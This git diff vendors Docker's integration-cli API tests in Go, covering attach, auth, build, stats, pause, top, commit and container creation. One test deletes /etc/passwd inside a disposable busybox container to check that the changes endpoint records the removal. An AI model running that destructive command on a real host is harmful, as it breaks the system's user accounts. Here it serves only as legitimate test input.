check.Commentf("Attach didn't return the expected data from %s", stream)) + } + + expectTimeout := func(conn net.Conn, br *bufio.Reader, stream string) { + defer conn.Close() + _, err := conn.Write([]byte{'t'}) + c.Assert(err, checker.IsNil) + + conn.SetReadDeadline(time.Now().Add(time.Second)) + actual := make([]byte, 1) + _, err = io.ReadFull(br, actual) + opErr, ok := err.(*net.OpError) + c.Assert(ok, checker.Equals, true, check.Commentf("Error is expected to be *net.OpError, got %v", err)) + c.Assert(opErr.Timeout(), checker.Equals, true, check.Commentf("Read from %s is expected to timeout", stream)) + } + + // Create a container that only emits stdout. + cid, _ := dockerCmd(c, "run", "-di", "busybox", "cat") + cid = strings.TrimSpace(cid) + // Attach to the container's stdout stream. + conn, br, err := sockRequestHijack("POST", "/containers/"+cid+"/attach?stream=1&stdin=1&stdout=1", nil, "text/plain") + c.Assert(err, checker.IsNil) + // Check if the data from stdout can be received. + expectSuccess(conn, br, "stdout", false) + // Attach to the container's stderr stream. + conn, br, err = sockRequestHijack("POST", "/containers/"+cid+"/attach?stream=1&stdin=1&stderr=1", nil, "text/plain") + c.Assert(err, checker.IsNil) + // Since the container only emits stdout, attaching to stderr should return nothing. + expectTimeout(conn, br, "stdout") + + // Test the similar functions of the stderr stream. + cid, _ = dockerCmd(c, "run", "-di", "busybox", "/bin/sh", "-c", "cat >&2") + cid = strings.TrimSpace(cid) + conn, br, err = sockRequestHijack("POST", "/containers/"+cid+"/attach?stream=1&stdin=1&stderr=1", nil, "text/plain") + c.Assert(err, checker.IsNil) + expectSuccess(conn, br, "stderr", false) + conn, br, err = sockRequestHijack("POST", "/containers/"+cid+"/attach?stream=1&stdin=1&stdout=1", nil, "text/plain") + c.Assert(err, checker.IsNil) + expectTimeout(conn, br, "stderr") + + // Test with tty. + cid, _ = dockerCmd(c, "run", "-dit", "busybox", "/bin/sh", "-c", "cat >&2") + cid = strings.TrimSpace(cid) + // Attach to stdout only. + conn, br, err = sockRequestHijack("POST", "/containers/"+cid+"/attach?stream=1&stdin=1&stdout=1", nil, "text/plain") + c.Assert(err, checker.IsNil) + expectSuccess(conn, br, "stdout", true) + + // Attach without stdout stream. + conn, br, err = sockRequestHijack("POST", "/containers/"+cid+"/attach?stream=1&stdin=1&stderr=1", nil, "text/plain") + c.Assert(err, checker.IsNil) + // Nothing should be received because both the stdout and stderr of the container will be + // sent to the client as stdout when tty is enabled. + expectTimeout(conn, br, "stdout") + + // Test the client API + // Make sure we don't see "hello" if Logs is false + client, err := client.NewEnvClient() + c.Assert(err, checker.IsNil) + + cid, _ = dockerCmd(c, "run", "-di", "busybox", "/bin/sh", "-c", "echo hello; cat") + cid = strings.TrimSpace(cid) + + attachOpts := types.ContainerAttachOptions{ + Stream: true, + Stdin: true, + Stdout: true, + } + + resp, err := client.ContainerAttach(context.Background(), cid, attachOpts) + c.Assert(err, checker.IsNil) + expectSuccess(resp.Conn, resp.Reader, "stdout", false) + + // Make sure we do see "hello" if Logs is true + attachOpts.Logs = true + resp, err = client.ContainerAttach(context.Background(), cid, attachOpts) + c.Assert(err, checker.IsNil) + + defer resp.Conn.Close() + resp.Conn.SetReadDeadline(time.Now().Add(time.Second)) + + _, err = resp.Conn.Write([]byte("success")) + c.Assert(err, checker.IsNil) + + actualStdout := new(bytes.Buffer) + actualStderr := new(bytes.Buffer) + stdcopy.StdCopy(actualStdout, actualStderr, resp.Reader) + c.Assert(actualStdout.Bytes(), checker.DeepEquals, []byte("hello\nsuccess"), check.Commentf("Attach didn't return the expected data from stdout")) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_auth_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_auth_test.go new file mode 100644 index 0000000000..bfcae31bd0 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_api_auth_test.go @@ -0,0 +1,25 @@ +package main + +import ( + "net/http" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +// Test case for #22244 +func (s *DockerSuite) TestAuthAPI(c *check.C) { + testRequires(c, Network) + config := types.AuthConfig{ + Username: "no-user", + Password: "no-password", + } + + expected := "Get https://registry-1.docker.io/v2/: unauthorized: incorrect username or password" + status, body, err := sockRequest("POST", "/auth", config) + c.Assert(err, check.IsNil) + c.Assert(status, check.Equals, http.StatusUnauthorized) + msg := getErrorMessage(c, body) + c.Assert(msg, checker.Contains, expected, check.Commentf("Expected: %v, got: %v", expected, msg)) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_build_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_build_test.go new file mode 100644 index 0000000000..9b069a43a6 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_api_build_test.go @@ -0,0 +1,254 @@ +package main + +import ( + "archive/tar" + "bytes" + "net/http" + "regexp" + "strings" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +func (s *DockerSuite) TestBuildAPIDockerFileRemote(c *check.C) { + testRequires(c, NotUserNamespace) + var testD string + if daemonPlatform == "windows" { + testD = `FROM busybox +COPY * /tmp/ +RUN find / -name ba* +RUN find /tmp/` + } else { + // -xdev is required because sysfs can cause EPERM + testD = `FROM busybox +COPY * /tmp/ +RUN find / -xdev -name ba* +RUN find /tmp/` + } + server, err := fakeStorage(map[string]string{"testD": testD}) + c.Assert(err, checker.IsNil) + defer server.Close() + + res, body, err := sockRequestRaw("POST", "/build?dockerfile=baz&remote="+server.URL()+"/testD", nil, "application/json") + c.Assert(err, checker.IsNil) + c.Assert(res.StatusCode, checker.Equals, http.StatusOK) + + buf, err := readBody(body) + c.Assert(err, checker.IsNil) + + // Make sure Dockerfile exists. + // Make sure 'baz' doesn't exist ANYWHERE despite being mentioned in the URL + out := string(buf) + c.Assert(out, checker.Contains, "/tmp/Dockerfile") + c.Assert(out, checker.Not(checker.Contains), "baz") +} + +func (s *DockerSuite) TestBuildAPIRemoteTarballContext(c *check.C) { + buffer := new(bytes.Buffer) + tw := tar.NewWriter(buffer) + defer tw.Close() + + dockerfile := []byte("FROM busybox") + err := tw.WriteHeader(&tar.Header{ + Name: "Dockerfile", + Size: int64(len(dockerfile)), + }) + // failed to write tar file header + c.Assert(err, checker.IsNil) + + _, err = tw.Write(dockerfile) + // failed to write tar file content + c.Assert(err, checker.IsNil) + + // failed to close tar archive + c.Assert(tw.Close(), checker.IsNil) + + server, err := fakeBinaryStorage(map[string]*bytes.Buffer{ + "testT.tar": buffer, + }) + c.Assert(err, checker.IsNil) + + defer server.Close() + + res, b, err := sockRequestRaw("POST", "/build?remote="+server.URL()+"/testT.tar", nil, "application/tar") + c.Assert(err, checker.IsNil) + c.Assert(res.StatusCode, checker.Equals, http.StatusOK) + b.Close() +} + +func (s *DockerSuite) TestBuildAPIRemoteTarballContextWithCustomDockerfile(c *check.C) { + buffer := new(bytes.Buffer) + tw := tar.NewWriter(buffer) + defer tw.Close() + + dockerfile := []byte(`FROM busybox +RUN echo 'wrong'`) + err := tw.WriteHeader(&tar.Header{ + Name: "Dockerfile", + Size: int64(len(dockerfile)), + }) + // failed to write tar file header + c.Assert(err, checker.IsNil) + + _, err = tw.Write(dockerfile) + // failed to write tar file content + c.Assert(err, checker.IsNil) + + custom := []byte(`FROM busybox +RUN echo 'right' +`) + err = tw.WriteHeader(&tar.Header{ + Name: "custom", + Size: int64(len(custom)), + }) + + // failed to write tar file header + c.Assert(err, checker.IsNil) + + _, err = tw.Write(custom) + // failed to write tar file content + c.Assert(err, checker.IsNil) + + // failed to close tar archive + c.Assert(tw.Close(), checker.IsNil) + + server, err := fakeBinaryStorage(map[string]*bytes.Buffer{ + "testT.tar": buffer, + }) + c.Assert(err, checker.IsNil) + + defer server.Close() + url := "/build?dockerfile=custom&remote=" + server.URL() + "/testT.tar" + res, body, err := sockRequestRaw("POST", url, nil, "application/tar") + c.Assert(err, checker.IsNil) + c.Assert(res.StatusCode, checker.Equals, http.StatusOK) + + defer body.Close() + content, err := readBody(body) + c.Assert(err, checker.IsNil) + + // Build used the wrong dockerfile. + c.Assert(string(content), checker.Not(checker.Contains), "wrong") +} + +func (s *DockerSuite) TestBuildAPILowerDockerfile(c *check.C) { + git, err := newFakeGit("repo", map[string]string{ + "dockerfile": `FROM busybox +RUN echo from dockerfile`, + }, false) + c.Assert(err, checker.IsNil) + defer git.Close() + + res, body, err := sockRequestRaw("POST", "/build?remote="+git.RepoURL, nil, "application/json") + c.Assert(err, checker.IsNil) + c.Assert(res.StatusCode, checker.Equals, http.StatusOK) + + buf, err := readBody(body) + c.Assert(err, checker.IsNil) + + out := string(buf) + c.Assert(out, checker.Contains, "from dockerfile") +} + +func (s *DockerSuite) TestBuildAPIBuildGitWithF(c *check.C) { + git, err := newFakeGit("repo", map[string]string{ + "baz": `FROM busybox +RUN echo from baz`, + "Dockerfile": `FROM busybox +RUN echo from Dockerfile`, + }, false) + c.Assert(err, checker.IsNil) + defer git.Close() + + // Make sure it tries to 'dockerfile' query param value + res, body, err := sockRequestRaw("POST", "/build?dockerfile=baz&remote="+git.RepoURL, nil, "application/json") + c.Assert(err, checker.IsNil) + c.Assert(res.StatusCode, checker.Equals, http.StatusOK) + + buf, err := readBody(body) + c.Assert(err, checker.IsNil) + + out := string(buf) + c.Assert(out, checker.Contains, "from baz") +} + +func (s *DockerSuite) TestBuildAPIDoubleDockerfile(c *check.C) { + testRequires(c, UnixCli) // dockerfile overwrites Dockerfile on Windows + git, err := newFakeGit("repo", map[string]string{ + "Dockerfile": `FROM busybox +RUN echo from Dockerfile`, + "dockerfile": `FROM busybox +RUN echo from dockerfile`, + }, false) + c.Assert(err, checker.IsNil) + defer git.Close() + + // Make sure it tries to 'dockerfile' query param value + res, body, err := sockRequestRaw("POST", "/build?remote="+git.RepoURL, nil, "application/json") + c.Assert(err, checker.IsNil) + c.Assert(res.StatusCode, checker.Equals, http.StatusOK) + + buf, err := readBody(body) + c.Assert(err, checker.IsNil) + + out := string(buf) + c.Assert(out, checker.Contains, "from Dockerfile") +} + +func (s *DockerSuite) TestBuildAPIUnnormalizedTarPaths(c *check.C) { + // Make sure that build context tars with entries of the form + // x/./y don't cause caching false positives. + + buildFromTarContext := func(fileContents []byte) string { + buffer := new(bytes.Buffer) + tw := tar.NewWriter(buffer) + defer tw.Close() + + dockerfile := []byte(`FROM busybox + COPY dir /dir/`) + err := tw.WriteHeader(&tar.Header{ + Name: "Dockerfile", + Size: int64(len(dockerfile)), + }) + //failed to write tar file header + c.Assert(err, checker.IsNil) + + _, err = tw.Write(dockerfile) + // failed to write Dockerfile in tar file content + c.Assert(err, checker.IsNil) + + err = tw.WriteHeader(&tar.Header{ + Name: "dir/./file", + Size: int64(len(fileContents)), + }) + //failed to write tar file header + c.Assert(err, checker.IsNil) + + _, err = tw.Write(fileContents) + // failed to write file contents in tar file content + c.Assert(err, checker.IsNil) + + // failed to close tar archive + c.Assert(tw.Close(), checker.IsNil) + + res, body, err := sockRequestRaw("POST", "/build", buffer, "application/x-tar") + c.Assert(err, checker.IsNil) + c.Assert(res.StatusCode, checker.Equals, http.StatusOK) + + out, err := readBody(body) + c.Assert(err, checker.IsNil) + lines := strings.Split(string(out), "\n") + c.Assert(len(lines), checker.GreaterThan, 1) + c.Assert(lines[len(lines)-2], checker.Matches, ".*Successfully built [0-9a-f]{12}.*") + + re := regexp.MustCompile("Successfully built ([0-9a-f]{12})") + matches := re.FindStringSubmatch(lines[len(lines)-2]) + return matches[1] + } + + imageA := buildFromTarContext([]byte("abc")) + imageB := buildFromTarContext([]byte("def")) + + c.Assert(imageA, checker.Not(checker.Equals), imageB) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_containers_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_containers_test.go new file mode 100644 index 0000000000..d046ec0684 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_api_containers_test.go @@ -0,0 +1,1961 @@ +package main + +import ( + "archive/tar" + "bytes" + "encoding/json" + "fmt" + "io" + "io/ioutil" + "net/http" + "net/http/httputil" + "net/url" + "os" + "path/filepath" + "regexp" + "strconv" + "strings" + "time" + + "github.com/docker/docker/api/types" + containertypes "github.com/docker/docker/api/types/container" + mounttypes "github.com/docker/docker/api/types/mount" + networktypes "github.com/docker/docker/api/types/network" + "github.com/docker/docker/pkg/integration" + "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/pkg/ioutils" + "github.com/docker/docker/pkg/mount" + "github.com/docker/docker/pkg/stringid" + "github.com/docker/docker/volume" + "github.com/go-check/check" +) + +func (s *DockerSuite) TestContainerAPIGetAll(c *check.C) { + startCount, err := getContainerCount() + c.Assert(err, checker.IsNil, check.Commentf("Cannot query container count")) + + name := "getall" + dockerCmd(c, "run", "--name", name, "busybox", "true") + + status, body, err := sockRequest("GET", "/containers/json?all=1", nil) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusOK) + + var inspectJSON []struct { + Names []string + } + err = json.Unmarshal(body, &inspectJSON) + c.Assert(err, checker.IsNil, check.Commentf("unable to unmarshal response body")) + + c.Assert(inspectJSON, checker.HasLen, startCount+1) + + actual := inspectJSON[0].Names[0] + c.Assert(actual, checker.Equals, "/"+name) +} + +// regression test for empty json field being omitted #13691 +func (s *DockerSuite) TestContainerAPIGetJSONNoFieldsOmitted(c *check.C) { + dockerCmd(c, "run", "busybox", "true") + + status, body, err := sockRequest("GET", "/containers/json?all=1", nil) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusOK) + + // empty Labels field triggered this bug, make sense to check for everything + // cause even Ports for instance can trigger this bug + // better safe than sorry.. + fields := []string{ + "Id", + "Names", + "Image", + "Command", + "Created", + "Ports", + "Labels", + "Status", + "NetworkSettings", + } + + // decoding into types.Container do not work since it eventually unmarshal + // and empty field to an empty go map, so we just check for a string + for _, f := range fields { + if !strings.Contains(string(body), f) { + c.Fatalf("Field %s is missing and it shouldn't", f) + } + } +} + +type containerPs struct { + Names []string + Ports []map[string]interface{} +} + +// regression test for non-empty fields from #13901 +func (s *DockerSuite) TestContainerAPIPsOmitFields(c *check.C) { + // Problematic for Windows porting due to networking not yet being passed back + testRequires(c, DaemonIsLinux) + name := "pstest" + port := 80 + runSleepingContainer(c, "--name", name, "--expose", strconv.Itoa(port)) + + status, body, err := sockRequest("GET", "/containers/json?all=1", nil) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusOK) + + var resp []containerPs + err = json.Unmarshal(body, &resp) + c.Assert(err, checker.IsNil) + + var foundContainer *containerPs + for _, container := range resp { + for _, testName := range container.Names { + if "/"+name == testName { + foundContainer = &container + break + } + } + } + + c.Assert(foundContainer.Ports, checker.HasLen, 1) + c.Assert(foundContainer.Ports[0]["PrivatePort"], checker.Equals, float64(port)) + _, ok := foundContainer.Ports[0]["PublicPort"] + c.Assert(ok, checker.Not(checker.Equals), true) + _, ok = foundContainer.Ports[0]["IP"] + c.Assert(ok, checker.Not(checker.Equals), true) +} + +func (s *DockerSuite) TestContainerAPIGetExport(c *check.C) { + // Not supported on Windows as Windows does not support docker export + testRequires(c, DaemonIsLinux) + name := "exportcontainer" + dockerCmd(c, "run", "--name", name, "busybox", "touch", "/test") + + status, body, err := sockRequest("GET", "/containers/"+name+"/export", nil) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusOK) + + found := false + for tarReader := tar.NewReader(bytes.NewReader(body)); ; { + h, err := tarReader.Next() + if err != nil && err == io.EOF { + break + } + if h.Name == "test" { + found = true + break + } + } + c.Assert(found, checker.True, check.Commentf("The created test file has not been found in the exported image")) +} + +func (s *DockerSuite) TestContainerAPIGetChanges(c *check.C) { + // Not supported on Windows as Windows does not support docker diff (/containers/name/changes) + testRequires(c, DaemonIsLinux) + name := "changescontainer" + dockerCmd(c, "run", "--name", name, "busybox", "rm", "/etc/passwd") + + status, body, err := sockRequest("GET", "/containers/"+name+"/changes", nil) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusOK) + + changes := []struct { + Kind int + Path string + }{} + c.Assert(json.Unmarshal(body, &changes), checker.IsNil, check.Commentf("unable to unmarshal response body")) + + // Check the changelog for removal of /etc/passwd + success := false + for _, elem := range changes { + if elem.Path == "/etc/passwd" && elem.Kind == 2 { + success = true + } + } + c.Assert(success, checker.True, check.Commentf("/etc/passwd has been removed but is not present in the diff")) +} + +func (s *DockerSuite) TestGetContainerStats(c *check.C) { + var ( + name = "statscontainer" + ) + runSleepingContainer(c, "--name", name) + + type b struct { + status int + body []byte + err error + } + bc := make(chan b, 1) + go func() { + status, body, err := sockRequest("GET", "/containers/"+name+"/stats", nil) + bc <- b{status, body, err} + }() + + // allow some time to stream the stats from the container + time.Sleep(4 * time.Second) + dockerCmd(c, "rm", "-f", name) + + // collect the results from the stats stream or timeout and fail + // if the stream was not disconnected. + select { + case <-time.After(2 * time.Second): + c.Fatal("stream was not closed after container was removed") + case sr := <-bc: + c.Assert(sr.err, checker.IsNil) + c.Assert(sr.status, checker.Equals, http.StatusOK) + + dec := json.NewDecoder(bytes.NewBuffer(sr.body)) + var s *types.Stats + // decode only one object from the stream + c.Assert(dec.Decode(&s), checker.IsNil) + } +} + +func (s *DockerSuite) TestGetContainerStatsRmRunning(c *check.C) { + out, _ := runSleepingContainer(c) + id := strings.TrimSpace(out) + + buf := &integration.ChannelBuffer{make(chan []byte, 1)} + defer buf.Close() + + _, body, err := sockRequestRaw("GET", "/containers/"+id+"/stats?stream=1", nil, "application/json") + c.Assert(err, checker.IsNil) + defer body.Close() + + chErr := make(chan error, 1) + go func() { + _, err = io.Copy(buf, body) + chErr <- err + }() + + b := make([]byte, 32) + // make sure we've got some stats + _, err = buf.ReadTimeout(b, 2*time.Second) + c.Assert(err, checker.IsNil) + + // Now remove without `-f` and make sure we are still pulling stats + _, _, err = dockerCmdWithError("rm", id) + c.Assert(err, checker.Not(checker.IsNil), check.Commentf("rm should have failed but didn't")) + _, err = buf.ReadTimeout(b, 2*time.Second) + c.Assert(err, checker.IsNil) + + dockerCmd(c, "rm", "-f", id) + c.Assert(<-chErr, checker.IsNil) +} + +// regression test for gh13421 +// previous test was just checking one stat entry so it didn't fail (stats with +// stream false always return one stat) +func (s *DockerSuite) TestGetContainerStatsStream(c *check.C) { + name := "statscontainer" + runSleepingContainer(c, "--name", name) + + type b struct { + status int + body []byte + err error + } + bc := make(chan b, 1) + go func() { + status, body, err := sockRequest("GET", "/containers/"+name+"/stats", nil) + bc <- b{status, body, err} + }() + + // allow some time to stream the stats from the container + time.Sleep(4 * time.Second) + dockerCmd(c, "rm", "-f", name) + + // collect the results from the stats stream or timeout and fail + // if the stream was not disconnected. + select { + case <-time.After(2 * time.Second): + c.Fatal("stream was not closed after container was removed") + case sr := <-bc: + c.Assert(sr.err, checker.IsNil) + c.Assert(sr.status, checker.Equals, http.StatusOK) + + s := string(sr.body) + // count occurrences of "read" of types.Stats + if l := strings.Count(s, "read"); l < 2 { + c.Fatalf("Expected more than one stat streamed, got %d", l) + } + } +} + +func (s *DockerSuite) TestGetContainerStatsNoStream(c *check.C) { + name := "statscontainer" + runSleepingContainer(c, "--name", name) + + type b struct { + status int + body []byte + err error + } + bc := make(chan b, 1) + go func() { + status, body, err := sockRequest("GET", "/containers/"+name+"/stats?stream=0", nil) + bc <- b{status, body, err} + }() + + // allow some time to stream the stats from the container + time.Sleep(4 * time.Second) + dockerCmd(c, "rm", "-f", name) + + // collect the results from the stats stream or timeout and fail + // if the stream was not disconnected. + select { + case <-time.After(2 * time.Second): + c.Fatal("stream was not closed after container was removed") + case sr := <-bc: + c.Assert(sr.err, checker.IsNil) + c.Assert(sr.status, checker.Equals, http.StatusOK) + + s := string(sr.body) + // count occurrences of `"read"` of types.Stats + c.Assert(strings.Count(s, `"read"`), checker.Equals, 1, check.Commentf("Expected only one stat streamed, got %d", strings.Count(s, `"read"`))) + } +} + +func (s *DockerSuite) TestGetStoppedContainerStats(c *check.C) { + name := "statscontainer" + dockerCmd(c, "create", "--name", name, "busybox", "ps") + + type stats struct { + status int + err error + } + chResp := make(chan stats) + + // We expect an immediate response, but if it's not immediate, the test would hang, so put it in a goroutine + // below we'll check this on a timeout. + go func() { + resp, body, err := sockRequestRaw("GET", "/containers/"+name+"/stats", nil, "") + body.Close() + chResp <- stats{resp.StatusCode, err} + }() + + select { + case r := <-chResp: + c.Assert(r.err, checker.IsNil) + c.Assert(r.status, checker.Equals, http.StatusOK) + case <-time.After(10 * time.Second): + c.Fatal("timeout waiting for stats response for stopped container") + } +} + +func (s *DockerSuite) TestContainerAPIPause(c *check.C) { + // Problematic on Windows as Windows does not support pause + testRequires(c, DaemonIsLinux) + defer unpauseAllContainers() + out, _ := dockerCmd(c, "run", "-d", "busybox", "sleep", "30") + ContainerID := strings.TrimSpace(out) + + status, _, err := sockRequest("POST", "/containers/"+ContainerID+"/pause", nil) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusNoContent) + + pausedContainers, err := getSliceOfPausedContainers() + c.Assert(err, checker.IsNil, check.Commentf("error thrown while checking if containers were paused")) + + if len(pausedContainers) != 1 || stringid.TruncateID(ContainerID) != pausedContainers[0] { + c.Fatalf("there should be one paused container and not %d", len(pausedContainers)) + } + + status, _, err = sockRequest("POST", "/containers/"+ContainerID+"/unpause", nil) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusNoContent) + + pausedContainers, err = getSliceOfPausedContainers() + c.Assert(err, checker.IsNil, check.Commentf("error thrown while checking if containers were paused")) + c.Assert(pausedContainers, checker.IsNil, check.Commentf("There should be no paused container.")) +} + +func (s *DockerSuite) TestContainerAPITop(c *check.C) { + testRequires(c, DaemonIsLinux) + out, _ := dockerCmd(c, "run", "-d", "busybox", "/bin/sh", "-c", "top") + id := strings.TrimSpace(string(out)) + c.Assert(waitRun(id), checker.IsNil) + + type topResp struct { + Titles []string + Processes [][]string + } + var top topResp + status, b, err := sockRequest("GET", "/containers/"+id+"/top?ps_args=aux", nil) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusOK) + c.Assert(json.Unmarshal(b, &top), checker.IsNil) + c.Assert(top.Titles, checker.HasLen, 11, check.Commentf("expected 11 titles, found %d: %v", len(top.Titles), top.Titles)) + + if top.Titles[0] != "USER" || top.Titles[10] != "COMMAND" { + c.Fatalf("expected `USER` at `Titles[0]` and `COMMAND` at Titles[10]: %v", top.Titles) + } + c.Assert(top.Processes, checker.HasLen, 2, check.Commentf("expected 2 processes, found %d: %v", len(top.Processes), top.Processes)) + c.Assert(top.Processes[0][10], checker.Equals, "/bin/sh -c top") + c.Assert(top.Processes[1][10], checker.Equals, "top") +} + +func (s *DockerSuite) TestContainerAPITopWindows(c *check.C) { + testRequires(c, DaemonIsWindows) + out, _ := runSleepingContainer(c, "-d") + id := strings.TrimSpace(string(out)) + c.Assert(waitRun(id), checker.IsNil) + + type topResp struct { + Titles []string + Processes [][]string + } + var top topResp + status, b, err := sockRequest("GET", "/containers/"+id+"/top", nil) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusOK) + c.Assert(json.Unmarshal(b, &top), checker.IsNil) + c.Assert(top.Titles, checker.HasLen, 4, check.Commentf("expected 4 titles, found %d: %v", len(top.Titles), top.Titles)) + + if top.Titles[0] != "Name" || top.Titles[3] != "Private Working Set" { + c.Fatalf("expected `Name` at `Titles[0]` and `Private Working Set` at Titles[3]: %v", top.Titles) + } + c.Assert(len(top.Processes), checker.GreaterOrEqualThan, 2, check.Commentf("expected at least 2 processes, found %d: %v", len(top.Processes), top.Processes)) + + foundProcess := false + expectedProcess := "busybox.exe" + for _, process := range top.Processes { + if process[0] == expectedProcess { + foundProcess = true + break + } + } + + c.Assert(foundProcess, checker.Equals, true, check.Commentf("expected to find %s: %v", expectedProcess, top.Processes)) +} + +func (s *DockerSuite) TestContainerAPICommit(c *check.C) { + cName := "testapicommit" + dockerCmd(c, "run", "--name="+cName, "busybox", "/bin/sh", "-c", "touch /test") + + name := "testcontainerapicommit" + status, b, err := sockRequest("POST", "/commit?repo="+name+"&testtag=tag&container="+cName, nil) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusCreated) + + type resp struct { + ID string + } + var img resp + c.Assert(json.Unmarshal(b, &img), checker.IsNil) + + cmd := inspectField(c, img.ID, "Config.Cmd") + c.Assert(cmd, checker.Equals, "[/bin/sh -c touch /test]", check.Commentf("got wrong Cmd from commit: %q", cmd)) + + // sanity check, make sure the image is what we think it is + dockerCmd(c, "run", img.ID, "ls", "/test") +} + +func (s *DockerSuite) TestContainerAPICommitWithLabelInConfig(c *check.C) { + cName := "testapicommitwithconfig" + dockerCmd(c, "run", "--name="+cName, "busybox", "/bin/sh", "-c", "touch /test") + + config := map[string]interface{}{ + "Labels": map[string]string{"key1": "value1", "key2": "value2"}, + } + + name := "testcontainerapicommitwithconfig" + status, b, err := sockRequest("POST", "/commit?repo="+name+"&container="+cName, config) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusCreated) + + type resp struct { + ID string + } + var img resp + c.Assert(json.Unmarshal(b, &img), checker.IsNil) + + label1 := inspectFieldMap(c, img.ID, "Config.Labels", "key1") + c.Assert(label1, checker.Equals, "value1") + + label2 := inspectFieldMap(c, img.ID, "Config.Labels", "key2") + c.Assert(label2, checker.Equals, "value2") + + cmd := inspectField(c, img.ID, "Config.Cmd") + c.Assert(cmd, checker.Equals, "[/bin/sh -c touch /test]", check.Commentf("got wrong Cmd from commit: %q", cmd)) + + // sanity check, make sure the image is what we think it is + dockerCmd(c, "run", img.ID, "ls", "/test") +} + +func (s *DockerSuite) TestContainerAPIBadPort(c *check.C) { + // TODO Windows to Windows CI - Port this test + testRequires(c, DaemonIsLinux) + config := map[string]interface{}{ + "Image": "busybox", + "Cmd": []string{"/bin/sh", "-c", "echo test"}, + "PortBindings": map[string]interface{}{ + "8080/tcp": []map[string]interface{}{ + { + "HostIP": "", + "HostPort": "aa80", + }, + }, + }, + } + + jsonData := bytes.NewBuffer(nil) + json.NewEncoder(jsonData).Encode(config) + + status, body, err := sockRequest("POST", "/containers/create", config) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusInternalServerError) + c.Assert(getErrorMessage(c, body), checker.Equals, `invalid port specification: "aa80"`, check.Commentf("Incorrect error msg: %s", body)) +} + +func (s *DockerSuite) TestContainerAPICreate(c *check.C) { + config := map[string]interface{}{ + "Image": "busybox", + "Cmd": []string{"/bin/sh", "-c", "touch /test && ls /test"}, + } + + status, b, err := sockRequest("POST", "/containers/create", config) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusCreated) + + type createResp struct { + ID string + } + var container createResp + c.Assert(json.Unmarshal(b, &container), checker.IsNil) + + out, _ := dockerCmd(c, "start", "-a", container.ID) + c.Assert(strings.TrimSpace(out), checker.Equals, "/test") +} + +func (s *DockerSuite) TestContainerAPICreateEmptyConfig(c *check.C) { + config := map[string]interface{}{} + + status, body, err := sockRequest("POST", "/containers/create", config) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusInternalServerError) + + expected := "Config cannot be empty in order to create a container" + c.Assert(getErrorMessage(c, body), checker.Equals, expected) +} + +func (s *DockerSuite) TestContainerAPICreateMultipleNetworksConfig(c *check.C) { + // Container creation must fail if client specified configurations for more than one network + config := map[string]interface{}{ + "Image": "busybox", + "NetworkingConfig": networktypes.NetworkingConfig{ + EndpointsConfig: map[string]*networktypes.EndpointSettings{ + "net1": {}, + "net2": {}, + "net3": {}, + }, + }, + } + + status, body, err := sockRequest("POST", "/containers/create", config) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusBadRequest) + msg := getErrorMessage(c, body) + // network name order in error message is not deterministic + c.Assert(msg, checker.Contains, "Container cannot be connected to network endpoints") + c.Assert(msg, checker.Contains, "net1") + c.Assert(msg, checker.Contains, "net2") + c.Assert(msg, checker.Contains, "net3") +} + +func (s *DockerSuite) TestContainerAPICreateWithHostName(c *check.C) { + hostName := "test-host" + config := map[string]interface{}{ + "Image": "busybox", + "Hostname": hostName, + } + + status, body, err := sockRequest("POST", "/containers/create", config) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusCreated) + + var container containertypes.ContainerCreateCreatedBody + c.Assert(json.Unmarshal(body, &container), checker.IsNil) + + status, body, err = sockRequest("GET", "/containers/"+container.ID+"/json", nil) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusOK) + + var containerJSON types.ContainerJSON + c.Assert(json.Unmarshal(body, &containerJSON), checker.IsNil) + c.Assert(containerJSON.Config.Hostname, checker.Equals, hostName, check.Commentf("Mismatched Hostname")) +} + +func (s *DockerSuite) TestContainerAPICreateWithDomainName(c *check.C) { + domainName := "test-domain" + config := map[string]interface{}{ + "Image": "busybox", + "Domainname": domainName, + } + + status, body, err := sockRequest("POST", "/containers/create", config) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusCreated) + + var container containertypes.ContainerCreateCreatedBody + c.Assert(json.Unmarshal(body, &container), checker.IsNil) + + status, body, err = sockRequest("GET", "/containers/"+container.ID+"/json", nil) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusOK) + + var containerJSON types.ContainerJSON + c.Assert(json.Unmarshal(body, &containerJSON), checker.IsNil) + c.Assert(containerJSON.Config.Domainname, checker.Equals, domainName, check.Commentf("Mismatched Domainname")) +} + +func (s *DockerSuite) TestContainerAPICreateBridgeNetworkMode(c *check.C) { + // Windows does not support bridge + testRequires(c, DaemonIsLinux) + UtilCreateNetworkMode(c, "bridge") +} 